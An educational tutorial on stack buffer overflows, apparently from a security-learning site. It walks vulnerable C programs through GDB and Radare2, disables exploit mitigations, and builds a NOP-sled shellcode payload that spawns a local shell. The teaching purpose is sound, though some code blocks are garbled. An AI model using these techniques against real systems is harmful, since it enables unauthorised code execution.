This section uses GDB. For the basics and used plugins see: GDB ↣. You can also use Radare2. To get familiar with it see: Radare2 ↣.
First popularized by the Morris worm and Elias Levy (aka. Aleph One) in his article for Phrack Magazine ([smash]), buffer overflows are one of the most common weaknesses in software.
They happen when a process writes past the confines of a fixed-sized buffer that is stored on the stack ([cwe121]). Depending on the specific memory layout this can allow for arbitrary code execution.
The severity (and feasability) is impacted by a combination of low-level architectural- and high-level language-design decisions.
While stack-based buffer overflows are possible in Harvard architectures ([hrvd]), the coexistance of data and instructions in the same address space in Von Neumann architectures makes them potentially more powerful.
Usually to improve performance, some languages (C/C++) don't enforce perimeters of buffers (arrays in this case) nor perform bounds checking.
Return-oriented programming uses stack based overflows to jump to existing instructions out of order. ROP allows working around security measures that try to prevent arbitrary code execution. The target of a jump is seen as valid because it's part of the original program or used libraries.
TODO write about bypassing the NX bit by jumping to the C standard library
TODO write about bypassing ASLR by jumping to the Procedure Linkage Table
This section covers exploit mitigation techniques and how to disable them to make writing the first exploit easier. This should only be done in a VM. This section focuses on Linux and gcc.
NX stands for No eXecute. This technology tries to remedy the issue that the Von Neumann architecture uses the same memory for instructions and data which can result in arbitrary code execution.
The NX bit allows marking specific segments as executable or not executable. This prevents arbitrary code execution from the stack (by crashing the process). It does not prevent return-to-libc attacks as the memory that contains the C Standard library has to be executable.
To enable execution of instructions on the stack, gcc can be passed the -z execstack
linker flag.
Also known as stack cookies.
Provide stack smashing protection by pushing an additional value to the stack (on function calls).
On function return that value is checked and if it is incorrect it means the stack has been smashed.
In that case the program terminates with SIGABRT
and warns about attempted stack smashing:
By default this is disabled in gcc, but some distributions patch gcc to enable it.
To disable stack canaries pass the -fno-stack-protector
flag to gcc.
TODO write about Address Space Layout Randomization.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
(until reboot)
TODO write about Position Independent Executables.
, -no-pie
TODO write about Control-Flow Integrity.
We'll use a small program (check_pin
) with a subtle bug to look at how a stack buffer overflow can happen and what consequences might follow.
This program asks the user for a pin via stdin.
There are two expected outcomes when running it:
- if the pin is correct it exits with return value
- if the pin is wrong it exits with return value
A possible usage scenario would be: ./check_pin && echo correct || echo wrong!
. Here's the source:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define INSTRUCTIONS "enter 3 digit pin:\n"
int check_pin() {
char buffer[4]; // pin + null terminator.
scanf("%s", buffer); // read pin.
// compare pin char by char:
while (strcmp(buffer, "042") != 0)
return EXIT_FAILURE; // usually 1.
return EXIT_SUCCESS; // usually 0.
int main(int argc, char** argv)
printf("%s", INSTRUCTIONS);
return check_pin();
- note the following:
- we reserve 4 Bytes for our
char array- 3 for the pin + 1 for the C-string
terminator thatscanf()
- 3 for the pin + 1 for the C-string
- we never actually check how long the user input is
- we just take whatever the user provided to us and stuff it into our buffer
- we reserve 4 Bytes for our
Let's compile it!
compiling check_pin.c with gcc:
gcc check_pin.c -o check_pin -ggdb \
-m32 -mpreferred-stack-boundary=2 \
-z execstack -fno-stack-protector \
-fno-pie -no-pie \
- note the following:
s are used to break up the command into multiple lines-o
specifies our executable name-ggdb
tells gdb to add debug symbols in its native format-m32
create 32-bit machine code-mpreferred-stack-boundary=2
align stack pointer to 4 Bytes (2^n)- all the other flags disable various exploit mitigations
(see countermeasures ↣ section)
Let's test it!
check_pin with wrong pin:
./check_pin < <(echo 123) && echo correct || echo wrong!
check_pin with correct pin:
./check_pin < <(echo 042) && echo correct || echo wrong!
Looks like our little program works just as we intended it to.
We know our program works fine if we follow the instructions.
Let's see what happens when we stray from the happy path!
check_pin with overlong input:
./check_pin <(echo aaaabbbbcccc) && echo correct || echo wrong!
Somewhere along the way we got a segmentation fault.
We still get a wrong
because segmentation faults produce a return code of 139
and that is not the same as 0
In case you are wondering why 139
: unsuccessful termination produces an error
of 128
plus the signal code that was the reason for the termination. The code for a segmentation violation is 11
See: man 7 signal
The signal segmentation violation/SIGSEGV
means our program tried to access an invalid memory address.
Let's give it another go from within gdb to find out why that happened.
segfault investigation with gdb:
gdb check_pin
# (gdb)
break *main
run < <(echo aaaabbbbcccc)
# this starts our program and runs it until we hit main+0.
# we use input redirection so we don't have to enter our input
# to scanf() during our debugging session.
# from here on out we `step` over C source lines:
step # step over `{`, the function prologue.
step # step over the printf() call.
# we have stopped just before calling check_pin():
- note the following:
- gdb gef shows us seven different sections that are labeled in the top right (see gdb ↣ for details)
- (a.) shows the instruction pointer, it points at the address of the upcoming instruction
- its value is
, which is thecall 0x8049196
instruction; compare with (c.)
- its value is
- (b.) this line is the youngest entry on the stack, note the address
- (c.) this is the machine instruction that will be executed next
- aditionally we get the position in the original source as well (thanks to debug symbols)
- for each line of C code there can be multiple assembly instructions
Now we step a single instruction (stepi
) to execute call <check_pin+0>
- note the following:
- (a.) the instruction pointer has been updated, now it points to the first instruction in
- (b.) the stack just grew by 4 Bytes (compare the address with the previously youngest item)
instructions push the return address of the calling function onto the stack- this is how we keep track of where execution should continue after a function ends
- at the end of
this address is popped and the instruction pointer set to it
- (c.) the next instruction is
push ebp
- this will backup the base pointer of the previous stack frame to the stack
- this way it can be restored when we return
- if you compare the previous
section to this one you will see that we gained a line- this displays the backtrace, a list of function calls
is always the current one and the higher the number the older the call
- (a.) the instruction pointer has been updated, now it points to the first instruction in
Use stepi 3
to step over the first three instructions of the check_pin
This block is called the function prologue and its purpose is to set up the stack frame for check_pin
The function prologue will:
- backup the base pointer to the stack,
- change the value of the base pointer to that of the stack pointer,
- and then grow the stack by 4 more Bytes to accomodate our
This will be our new state:
- note the following:
- The three youngest items on the stack are:
- (a.) 4 Bytes: the return address to
- (b.) 4 Bytes: the backup of the base pointer of
s stack frame - (c.) 4 Bytes: space for our
- (a.) 4 Bytes: the return address to
- The three youngest items on the stack are:
Let's create a drawing of our current stack layout.
We'll add another 4 Bytes above the return address to symbolize that the stack continues on (upwards).
- note the following:
- above our buffer is the backup of
s base pointer - above the backup of the base pointer is the return address to
- above our buffer is the backup of
This works fine as long as we stick to the instructions of our program.
3 Bytes for the pin plus 1 spare Byte for the NULL
- note the following:
- the stack grows down
- our buffer array grows up
- the reason is C's array indexing/pointer arithmetic
Here's the problem though: we provided an overlong input and the program never checked the length.
does not care and mindlessly continues to write Bytes as if our buffer was longer.
- note the following:
has no concept of buffer length- it simply calculates the address for
- the first
lands inbuffer[4]
, even though that's past the reserved space
- it simply calculates the address for
- Bytes 0-3 (
) land in our buffer - Bytes 4-7 (
) overwrite the backup of the base pointer - Bytes 8-11 (
) overwrite the return address - Byte 12 (
) overwrites whatever is above the return address
When check_pin()
returns to main()
the trashed base pointer is restored.
Crucially, in the next step the instruction pointer is trashed via the popped return address.
The instruction pointer is set to cccc
(hex 0x63 63 63 63
) and since we can't jump to that address we get a segfault.
If we let the rest of the program run out with continue
we can see the state after the crash:
- note the following:
- (a.) the base pointer was set to
- (b.) the instruction pointer was set to
- (c.) we got a
in hex is not an address we can access
- (a.) the base pointer was set to
We don't have much use for the base pointer, but control over the instruction pointer is fantastic:
We can jump anywhere we please!
These are small independent demos that demonstrate a single technique each.
Let's set the scene:
We are running a small message board where people can talk about the latest Sci-Fi novels. To avoid ruining the fun for other readers we would like to make use of ROT13 to encrypt spoilers in a way that is hard to read but easy to decrypt with common browser plugins.
We have found a C program that looks good:
- The code is very well documented,
- apparently it's tested with a wide range of data,
- it compiles on the first try,
- and we were able to successfully call it from PHP!
Here it is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define INSTRUCTIONS "enter your text to rot13 it:"
#define ROTATE_BY 13
// This is my secure implementation of the ROT13 algorithm.
// It has been successfully tested with a wide range of input.
// ROT13 is fun, feel free to use it everywhere!
void rot13()
char buffer[500] = { 0 }; // zero out our text buffer.
int i; // We are ANSI C compliant!
scanf("%[^\n]", buffer); // read everything until we encounter a newline.
// iterate over our input:
for (i = 0; i < strlen(buffer); i++)
int c = buffer[i]; // cast current char to int.
if ( (c >= 'A' && c <= 'Z') ) c -= ('A'-'a'); // lowercase A-Z.
if ( (c >= 'a' && c <= 'z') ) // for a to z:
c -= 'a'; // a = 0, z = 25, great for modulo shenanigans.
c += ROTATE_BY; // the actual rotation.
c %= ('z'-'a'+1); // make sure we stay in mod 26.
c += 'a'; // back to ASCII so we can print it.
putchar(c); // print rotated char (or original symbol).
putchar('\n'); // add a linebreak at the end of the text.
int main(int argc, char** argv)
// let the user know what to do:
Unfortunately comments can lie and it has the same bug as the check_pin example. Even worse it uses a big buffer: perfect for depositing shell-code. Someone used this vulnerability to deface our message board with fantasy novels!
What happened?
Let's investigate by poking at the program:
# try to crash it by sending a thousand As via stdin.
./rot13 < <(python -c 'print("A"*1000)')
# yep, crashes.
gdb rot13
# (gdb)
pattern create 1000 # create a De Bruijn pattern.
run # paste it when asked for input.
# search which part of the pattern lands in eip:
pattern search $eip # likely offset: 516.
# let's make sure:
run < <(python -c 'print("A"*516+"BEN!")')
# great, our instruction pointer contains "BEN!",
# which means 516 is indeed the correct offset.
Any position in a De Bruijn pattern ([debruijn]) can be uniquely identified by a substring that is (at least) the same length as the order of the pattern. GDB GEF ↣ has created a pattern of the order of Bytes in a register (4).
Taking a look at such a string will make it easier to grasp:
gdb gef
pattern create 50
Any substring of length 4 or above is unique and as such has an identifyable position.
This makes it possible to locate the part of the pattern that lands in the instruction pointer and thus the offset for controlling where the CPU will jump to. Of course it would be possible for that substring to appear in memory for another reason, which is why it is a good idea to check.
In our case the offset was the right one. We now have the ability to continue the program at an arbitrary address. Additionally we have control over a large buffer.
Let's combine the two.
Let us create a very simple payload as a start. For now we will exit the program with return code 0.
#!/usr/bin/env python3
# payload layout:
# ---
# nopsled
# code
# spacing
# return_address
import sys
instruction_pointer_offset = 516
return_address="\xDC\xD2\xFF\xFF" # reverse Byte order.
spacing_length = 32
code = (
code_length = len(code)
nopsled_length = instruction_pointer_offset - spacing_length - code_length
return_address_length = len(return_address)
payload = (
"\x90" * nopsled_length +
code +
"\xCC" * spacing_length +
payload_length = len(payload)
with open("payload", "wb") as f:
print("payload layout\n---")
print("nops:\t", nopsled_length)
print("code:\t", code_length)
print("ints:\t", spacing_length)
print("addr:\t", return_address_length)
print("---\nsum:\t", payload_length)
payload layout
nops: 478
code: 6
ints: 32
addr: 4
sum: 520
hexdump starting with Byte 400 via
xxd -s400 payload
00000190: 9090 9090 9090 9090 9090 9090 9090 9090 ................
000001a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
000001b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
000001c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
000001d0: 9090 9090 9090 9090 9090 9090 9090 b001 ................
000001e0: 31db cd80 cccc cccc cccc cccc cccc cccc 1...............
000001f0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00000200: cccc cccc dcd2 ffff ........
- note the following:
- there are 78 nops (plus 400 before that)
- followed by our 6 Bytes of code
- followed by 32 Bytes of spacing
- this should never be executed (but if it is
will generate a breakpoint interrupt)
- this should never be executed (but if it is
- followed by
dcd2 ffff
, our return address in reverse Byte order
As long as we hit any of the 478 nops (or the first Byte of our code) this will work.
Here's a visual representation (via Radare2 ↣) of the generated payload:
- note the following:
- each Byte value has a unique color, Bytes with the same value have the same color
- (a.) the big block at the beginning is our nop-sled
- if we jump to any address in this block the CPU will skip along it (once it's loaded into memory)
- by executing one nop (no-operation) after another
- if we jump to any address in this block the CPU will skip along it (once it's loaded into memory)
- (b.) until it hit's the second block, our payload
- (c.) this block is used to clear space for other variables
- a common method is to fill this with return addresses as well
- (d.) this block contains the 4 Bytes that land in the instruction pointer register
- from here we jump to anywhere in the nop-sled
- the end of this block is the end of the file
Let's look at how the payload looks once it's loaded into memory (on the stack)!
Radare2 (used for the visualization) has a slightly different environment than GDB. That's why the address we jump to is different too:
git diff
diff --git a/ b/
index 7c253d4..8ed1a62 100755
--- a/
+++ b/
@@ -11 +11 @@ ip_offset = 516
@@ -29 +29 @@ payload_length = len(payload)
-with open("payload", "wb") as f:
+with open("payload_r2", "wb") as f:
- note the following:
- we are looking at the stack
- in Radare2, low memory addresses are at the top
- our payload is surrounded by other memory
- below are the older parts of the stack
- above is garbage memory (might be left over data from when the stack was bigger)
- the spacing block (the
s) are partially overwritten- this part of the memory contains the
and thec
- this part of the memory contains the
- the GDB and Radare2 payloads differ in their address that land in the instruction pointer
- a few more interesting patterns:
- two color blocks followed by two white blocks:
these patterns are probably addresses that point to somewhere on the stack (0x____FFFF
, reverse order) - the four black Bytes to the right of our overwritten return address: backup of libc's base pointer (
) - the four colored Bytes to the right of that: return address after main (to libc, no two leading
) - the four blocks left of our overwritten address: backup of main's base pointer
- two color blocks followed by two white blocks:
Let's follow along in GDB to see if it works:
gdb rot13
# (gdb)
break *rot13+219 # break just before the ret.
run < payload # inject payload.
# step through to see it work.
Let's now use code that'll spawn a dash
! The modified
version of the previous script uses this payload instead:
shellcode by Steven C. Hanna, PhD
payload layout
nops: 438
code: 46
ints: 32
addr: 4
sum: 520
Here is the same visualization with our new payload:
- note the following:
- the longer the payload, the less space is left for the nop sled
- the shorter the nop sled, the harder it is to guess the correct address to jump to
inject payload
ps -p $$
cat payload - | ./rot13 # keep stdin open.
# sh
# enter, flush buffer.
ps -p $$ # /bin/sh.
tty # not a tty.
python -c "import pty;pty.spawn('/bin/bash')" # proper bash.
uname -a;id;pwd
We've got a shell :)
- [cwe121] CLASP. (2006). CWE-121: Stack-based Buffer Overflow. Mitre.
- [debruijn] De Bruijn, N. G., & W. van der Woude. (1946). A combinatorial problem. Proceedings of the Section of Sciences of the Koninklijke Nederlandse Akademie van Wetenschappen Te Amsterdam.
- [hrvd] Watts, K., & Oman, P. (2009). Stack-based buffer overflows in Harvard class embedded systems. IFIP Advances in Information and Communication Technology, 311.
- [pracbin] Andriesse, D., & Francisco, S. (2018). PRACTICAL BINARY ANALYSIS Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly (2nd ed.). No Starch Press.
- [re4b] Yurichev, D. (2013). Reverse Engineering for Beginners.
- [smash] Alpeph One. (1996). Smashing The Stack For Fun And Profit. Phrack.